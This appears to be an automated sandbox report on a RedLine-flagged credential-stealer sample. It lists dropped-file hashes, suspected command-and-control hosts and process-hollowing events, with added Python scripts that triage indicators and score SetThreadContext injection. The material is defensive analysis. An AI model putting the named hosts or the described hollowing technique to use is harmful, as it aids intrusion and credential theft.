| SHA512 | 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b |
memory/2072-242-0x0000000000000000-mapping.dmp
memory/2084-243-0x0000000000000000-mapping.dmp
memory/2120-244-0x0000000000000000-mapping.dmp
memory/2132-245-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2184-247-0x0000000000000000-mapping.dmp
memory/2196-248-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2248-250-0x0000000000000000-mapping.dmp
memory/2260-251-0x0000000000000000-mapping.dmp
memory/2308-252-0x0000000000000000-mapping.dmp
memory/2320-253-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2376-256-0x0000000000000000-mapping.dmp
memory/2388-257-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2456-259-0x0000000000000000-mapping.dmp
memory/2528-260-0x0000000000000000-mapping.dmp
memory/2592-261-0x0000000000000000-mapping.dmp
memory/2604-262-0x0000000000000000-mapping.dmp
memory/2604-266-0x0000000019310000-0x0000000019312000-memory.dmp
memory/2604-267-0x0000000019314000-0x0000000019316000-memory.dmp
memory/2604-298-0x000000001931A000-0x0000000019339000-memory.dmp
memory/2848-299-0x0000000000000000-mapping.dmp
memory/2860-300-0x0000000000000000-mapping.dmp
memory/2884-301-0x0000000000000000-mapping.dmp
memory/2896-302-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\clr.exe
| MD5 | 472208d7ba18d4c14b7e90b9db5d6feb |
| SHA1 | ff24cc43998ff99e61b1a838e1d51c4888498935 |
| SHA256 | ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d |
| SHA512 | 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15 |
memory/2968-304-0x0000000000000000-mapping.dmp
memory/2980-305-0x0000000000000000-mapping.dmp
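Turning the Network table and the Files list above into indicators needs two kinds of filtering. On the network side, the resolver rows (8.8.8.8:53) carry the DNS server's address rather than the peer's, and several names are Windows certificate-validation fetches (x1.c.lencr.org is Let's Encrypt, pki.goog is Google Trust Services, ocsp.verisign.com is an OCSP responder) or public IP-lookup and link-tracking services (api.ip.sb, iplogger.com, and 2no.co, which resolves to the same 88.99.66.31 as iplogger.com in the table). On the file side, the same dropped executable is listed several times with identical hashes, and the `\??\PIPE\samr`, `\??\PIPE\lsarpc` and `\??\PIPE\srvsvc` entries carry the hash of zero bytes (e3b0c442...b855 is SHA-256 of empty input): those are the RPC pipes the `net user` commands go through, not files. The script below is an added example, not part of the report: it parses a subset of rows copied from both tables, buckets each destination with allowlists that are the analyst's own assumption, and collapses the file entries to one path per SHA-256 with the pipe and empty-object noise removed. Everything not allowlisted is treated as a C2 candidate to be verified, not as a confirmed finding.

```python
import re
from collections import defaultdict

# Rows copied from the Network table above (the report's own data), trimmed to a
# representative subset so the example stays short and runs offline.
NETWORK_ROWS = """
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 88.99.66.31:443 | iplogger.com | tcp |
| N/A | 104.73.131.204:80 | x1.c.lencr.org | tcp |
| N/A | 45.139.184.124:80 | loadexpert.info | tcp |
| N/A | 45.139.184.124:80 | cookiebrokrash.info | tcp |
| N/A | 13.227.222.49:443 | www.binance.com | tcp |
| N/A | 216.239.32.29:80 | pki.goog | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 93.189.40.76:80 | lllwyerxedo.xyz | tcp |
| N/A | 45.61.137.117:80 | 45.61.137.117 | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 194.180.174.56:443 | hitnaiguat.xyz | tcp |
| N/A | 23.51.123.27:80 | ocsp.verisign.com | tcp |
"""

# Entries copied from the Files list above, again a subset: one dropped executable
# recorded twice, a named pipe with empty content, a memory-dump line, and the DLL
# written to System32.
FILE_ROWS = r"""
memory/1652-60-0x0000000075561000-0x0000000075563000-memory.dmp
\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
"""

EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA-256 of zero bytes

# Analyst allowlists (an assumption of this example, not part of the report).
CATEGORIES = {
    "infra_noise":    ("lencr.org", "pki.goog", "ocsp.verisign.com", "microsoft.com"),
    "ip_lookup":      ("api.ip.sb", "iplogger.com", "2no.co"),
    "public_hosting": ("raw.githubusercontent.com", "cdn.discordapp.com"),
    "finance_site":   ("binance.com", "bnbstatic.com"),
}

ROW_RE = re.compile(r"^\|\s*[^|]*?\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*(\w+)\s*\|$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify_destination(name):
    """Bucket a destination name; bare IPs and unknown names are C2 candidates."""
    if IPV4_RE.match(name):
        return "candidate_c2"
    for category, suffixes in CATEGORIES.items():
        if any(name == s or name.endswith("." + s) for s in suffixes):
            return category
    return "candidate_c2"


def parse_network(text):
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ip, port = m.group(1).rsplit(":", 1)
            rows.append({"ip": ip, "port": int(port), "name": m.group(2), "proto": m.group(3).lower()})
    return rows


def parse_files(text):
    """Map each path line to the hash rows that follow it; memory dumps are skipped."""
    entries, current = {}, None
    for line in text.strip().splitlines():
        line = line.strip()
        m = HASH_RE.match(line)
        if m and current is not None:
            entries.setdefault(current, {})[m.group(1)] = m.group(2)
        elif line.startswith("memory/"):
            current = None
        elif not line.startswith("|"):
            current = line
    return entries


def extract_iocs(network_text, file_text):
    by_category = defaultdict(set)
    candidate_ips = set()
    for row in parse_network(network_text):
        category = classify_destination(row["name"])
        if not IPV4_RE.match(row["name"]):
            by_category[category].add(row["name"])
        # Resolver rows (udp/53) carry the DNS server's address, not the peer's.
        if category == "candidate_c2" and not (row["proto"] == "udp" and row["port"] == 53):
            candidate_ips.add(row["ip"])
    dropped = {}
    for path, hashes in parse_files(file_text).items():
        sha = hashes.get("SHA256")
        if sha is None or sha == EMPTY_SHA256 or "\\PIPE\\" in path.upper():
            continue                      # named pipes and empty objects are not file IOCs
        dropped.setdefault(sha, path)     # first path seen wins; repeated entries collapse
    return {"by_category": dict(by_category), "candidate_ips": candidate_ips, "dropped_files": dropped}
```

The finance_site bucket exists only so that www.binance.com and bin.bnbstatic.com are not blocked as C2; the report does not say which process opened those connections, so why the run reached an exchange is a question for the process that made them, not for the IOC list.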
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-14 06:48
Reported
2021-08-14 06:50
Platform
win10v20210410
Max time kernel
151s
Max time network
152s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1137791014.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2988 set thread context of 3544 | N/A | C:\Users\Admin\AppData\Local\Temp\936213988.exe | C:\Users\Admin\AppData\Local\Temp\936213988.exe |
| PID 3872 set thread context of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
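A process calling SetThreadContext on a thread in another process is the step of process hollowing where the suspended child's entry point is redirected to injected code; outside of debuggers there is almost no legitimate reason for it. The two rows above show both common shapes: the dropped loader 936213988.exe re-executing its own image and rewriting the child, and powershell.exe hollowing aspnet_compiler.exe, a signed .NET framework utility that a workstation normally never runs. The script below is an added example, not part of the report or of the sandbox that produced it: it turns rows of this table into findings with a severity. The image lists, the user-writable path prefixes and the severity rule (two independent reasons make a high finding) are the example's own heuristics, and the third event is constructed to show the debugger allowlist; the first two are the report's rows.

```python
import re
from pathlib import PureWindowsPath

# The two rows of the SetThreadContext table above (report data) plus one
# constructed debugger row that is not from the report, to show the allowlist path.
EVENTS = [
    ("PID 2988 set thread context of 3544",
     r"C:\Users\Admin\AppData\Local\Temp\936213988.exe",
     r"C:\Users\Admin\AppData\Local\Temp\936213988.exe"),
    ("PID 3872 set thread context of 4936",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"),
    ("PID 4100 set thread context of 4104",   # constructed, not in the report
     r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     r"C:\Users\Admin\source\repos\App\bin\Debug\App.exe"),
]

CTX_RE = re.compile(r"PID (\d+) set thread context of (\d+)")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Signed .NET framework utilities that loaders routinely spawn suspended and overwrite.
HOLLOW_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "applaunch.exe", "caspol.exe"}
DEBUGGERS = {"devenv.exe", "windbg.exe", "x64dbg.exe", "x32dbg.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def assess(description, source, target):
    """Turn one SetThreadContext row into a finding with a severity and reasons."""
    m = CTX_RE.search(description)
    if not m:
        return None
    src_pid, dst_pid = (int(x) for x in m.groups())
    src, dst = PureWindowsPath(source).name.lower(), PureWindowsPath(target).name.lower()
    finding = {"src_pid": src_pid, "dst_pid": dst_pid, "source": src, "target": dst}
    if src in DEBUGGERS:
        finding.update(kind="debugger", severity="low", reasons=["known debugger image"])
        return finding
    reasons = []
    kind = "self_injection" if src == dst else "cross_image"
    if kind == "self_injection":
        reasons.append("spawns its own image and rewrites the new process (unpacking stub)")
    if src in SCRIPT_HOSTS:
        reasons.append(f"source is a script host ({src})")
    if dst in HOLLOW_TARGETS:
        reasons.append(f"target {dst} is a .NET utility commonly used as a hollowing host")
    if any(p in source.lower() for p in USER_WRITABLE):
        reasons.append("source image runs from a user-writable path")
    finding.update(kind=kind, severity="high" if len(reasons) >= 2 else "medium", reasons=reasons)
    return finding


def assess_all(events):
    return [f for f in (assess(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in assess_all(EVENTS):
        print(f"{f['severity']:6} {f['kind']:15} {f['src_pid']} -> {f['dst_pid']}: " + "; ".join(f["reasons"]))
```

On a real endpoint the same rule runs over a Sysmon or EDR thread-context event; the PIDs 2988/3544 and 3872/4936 here are the sandbox's, and what carries over to a hunt is the image pairing, not the numbers.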
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000041d4683b016610a3fb6c0da47a242beb5199c321c566955b767afed05acb1795a834fef4cae423457310d867e3d9595e529aca577804adacecc2ec238792997065fe1af99228853a1d650d29bf37243a1dbc17783b9c8ac4f46f | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "335771510" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1642edecd890d701 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000c72fb1536feb18a56114af715885f469bf6ebc4593fe8b880c6bd79198d136c4ef9903b8f44ccc9aef0f155b186b88c208d58364ed0f33c6c612 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
